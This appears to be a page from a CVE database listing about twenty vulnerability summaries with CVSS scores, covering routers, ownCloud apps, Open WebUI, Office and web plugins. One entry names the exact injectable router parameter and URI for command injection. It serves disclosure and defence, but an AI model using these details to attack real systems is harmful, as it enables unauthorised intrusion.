Total
286780 CVE
| CVE | Vendors | Products | Updated | CVSS v3.1 |
|---|---|---|---|---|
| CVE-2018-10562 | 1 Dasannetworks | 2 Gpon Router, Gpon Router Firmware | 2025-03-26 | 9.8 Critical |
| An issue was discovered on Dasan GPON home routers. Command Injection can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output. | ||||
| CVE-2023-23948 | 1 Owncloud | 1 Owncloud Client | 2025-03-26 | 6.2 Medium |
| The ownCloud Android app allows ownCloud users to access, share, and edit files and folders. Version 2.21.1 of the ownCloud Android app is vulnerable to SQL injection in `FileContentProvider.kt`. This issue can lead to information disclosure. Two databases, `filelist` and `owncloud_database`, are affected. In version 3.0, the `filelist` database was deprecated. However, injections affecting `owncloud_database` remain relevant as of version 3.0. | ||||
| CVE-2020-36250 | 1 Owncloud | 1 Owncloud Client | 2025-03-26 | 6.1 Medium |
| In the ownCloud application before 2.15 for Android, the lock protection mechanism can be bypassed by moving the system date/time into the past. | ||||
| CVE-2020-36248 | 1 Owncloud | 1 Owncloud Client | 2025-03-26 | 3.9 Low |
| The ownCloud application before 2.15 for Android allows attackers to use adb to include a PIN preferences value in a backup archive, and consequently bypass the PIN lock feature by restoring from this archive. | ||||
| CVE-2025-27267 | 2025-03-26 | 7.1 High | ||
| Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in srcoley Random Quotes allows Reflected XSS. This issue affects Random Quotes: from n/a through 1.3. | ||||
| CVE-2024-7806 | 1 Openwebui | 1 Open Webui | 2025-03-26 | 8.8 High |
| A vulnerability in open-webui/open-webui versions <= 0.3.8 allows remote code execution by non-admin users via Cross-Site Request Forgery (CSRF). The application uses cookies with the SameSite attribute set to lax for authentication and lacks CSRF tokens. This allows an attacker to craft a malicious HTML that, when accessed by a victim, can modify the Python code of an existing pipeline and execute arbitrary code with the victim's privileges. | ||||
| CVE-2015-5955 | 1 Owncloud | 1 Owncloud Client | 2025-03-26 | N/A |
| ownCloud iOS app before 3.4.4 does not properly switch state between multiple instances, which might allow remote instance administrators to obtain sensitive credential and cookie information by reading authentication headers. | ||||
| CVE-2021-29256 | 1 Arm | 3 Bifrost, Midgard, Valhall | 2025-03-26 | 8.8 High |
| . The Arm Mali GPU kernel driver allows an unprivileged user to achieve access to freed memory, leading to information disclosure or root privilege escalation. This affects Bifrost r16p0 through r29p0 before r30p0, Valhall r19p0 through r29p0 before r30p0, and Midgard r28p0 through r30p0. | ||||
| CVE-2024-8021 | 1 Gradio Project | 1 Gradio | 2025-03-26 | 6.1 Medium |
| An open redirect vulnerability exists in the latest version of gradio-app/gradio. The vulnerability allows an attacker to redirect users to a malicious website by URL encoding. This can be exploited by sending a crafted request to the application, which results in a 302 redirect to an attacker-controlled site. | ||||
| CVE-2023-21237 | 1 Google | 1 Android | 2025-03-26 | 5.5 Medium |
| In applyRemoteView of NotificationContentInflater.java, there is a possible way to hide foreground service notification due to misleading or insufficient UI. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-251586912 | ||||
| CVE-2024-8026 | 1 Qanything | 1 Qanything | 2025-03-26 | 8.1 High |
| A Cross-Site Request Forgery (CSRF) vulnerability exists in the backend API of netease-youdao/qanything, as of commit d9ab8bc. The backend server has overly permissive CORS headers, allowing all cross-origin calls. This vulnerability affects all backend endpoints, enabling actions such as creating, uploading, listing, deleting files, and managing knowledge bases. | ||||
| CVE-2025-28858 | 2025-03-26 | 7.1 High | ||
| Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Arrow Plugins Arrow Maps allows Reflected XSS. This issue affects Arrow Maps: from n/a through 1.0.9. | ||||
| CVE-2010-2572 | 1 Microsoft | 1 Powerpoint | 2025-03-26 | 7.8 High |
| Buffer overflow in Microsoft PowerPoint 2002 SP3 and 2003 SP3 allows remote attackers to execute arbitrary code via a crafted PowerPoint 95 document, aka "PowerPoint Parsing Buffer Overflow Vulnerability." | ||||
| CVE-2025-28865 | 2025-03-26 | 7.1 High | ||
| Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in lionelroux WP Colorful Tag Cloud allows Reflected XSS. This issue affects WP Colorful Tag Cloud: from n/a through 2.0.1. | ||||
| CVE-2018-0798 | 1 Microsoft | 3 Office, Office Compatibility Pack, Word | 2025-03-26 | 8.8 High |
| Equation Editor in Microsoft Office 2007, Microsoft Office 2010, Microsoft Office 2013, and Microsoft Office 2016 allows a remote code execution vulnerability due to the way objects are handled in memory, aka "Microsoft Office Memory Corruption Vulnerability". | ||||
| CVE-2024-8053 | 1 Openwebui | 1 Open Webui | 2025-03-26 | 8.2 High |
| In version v0.3.10 of open-webui/open-webui, the `api/v1/utils/pdf` endpoint lacks authentication mechanisms, allowing unauthenticated attackers to access the PDF generation service. This vulnerability can be exploited by sending a POST request with an excessively large payload, potentially leading to server resource exhaustion and denial of service (DoS). Additionally, unauthorized users can misuse the endpoint to generate PDFs without verification, resulting in service misuse and potential operational and financial impacts. | ||||
| CVE-2018-0802 | 1 Microsoft | 3 Office, Office Compatibility Pack, Word | 2025-03-26 | 7.8 High |
| Equation Editor in Microsoft Office 2007, Microsoft Office 2010, Microsoft Office 2013, and Microsoft Office 2016 allow a remote code execution vulnerability due to the way objects are handled in memory, aka "Microsoft Office Memory Corruption Vulnerability". This CVE is unique from CVE-2018-0797 and CVE-2018-0812. | ||||
| CVE-2025-2098 | 2025-03-26 | N/A | ||
| Fast CAD Reader application on MacOS was found to be installed with incorrect file permissions (rwxrwxrwx). This is inconsistent with standard macOS security practices, where applications should have drwxr-xr-x permissions. Incorrect permissions allow for Dylib Hijacking. Guest account, other users and applications can exploit this vulnerability for privilege escalation. This issue affects Fast CAD ReaderĀ in possibly all versions since the vendor has not responded to our messages. The tested version was 4.1.5 | ||||
| CVE-2025-27406 | 2025-03-26 | 7.7 High | ||
| Icinga Reporting is the central component for reporting related functionality in the monitoring web frontend and framework Icinga Web 2. A vulnerability present in versions 0.10.0 through 1.0.2 allows to set up a template that allows to embed arbitrary Javascript. This enables the attacker to act on behalf of the user, if the template is being previewed; and act on behalf of the headless browser, if a report using the template is printed to PDF. This issue has been resolved in version 1.0.3 of Icinga Reporting. As a workaround, review all templates and remove suspicious settings. | ||||
| CVE-2025-27405 | 2025-03-26 | 7.7 High | ||
| Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. A vulnerability in versions prior to 2.11.5 and 2.12.13 allows an attacker to craft a URL that, once visited by any user, allows to embed arbitrary Javascript into Icinga Web and to act on behalf of that user. This issue has been resolved in versions 2.11.5 and 2.12.3 of Icinga Web 2. As a workaround, those who have Icinga Web 2.12.2 may enable a content security policy in the application settings. | ||||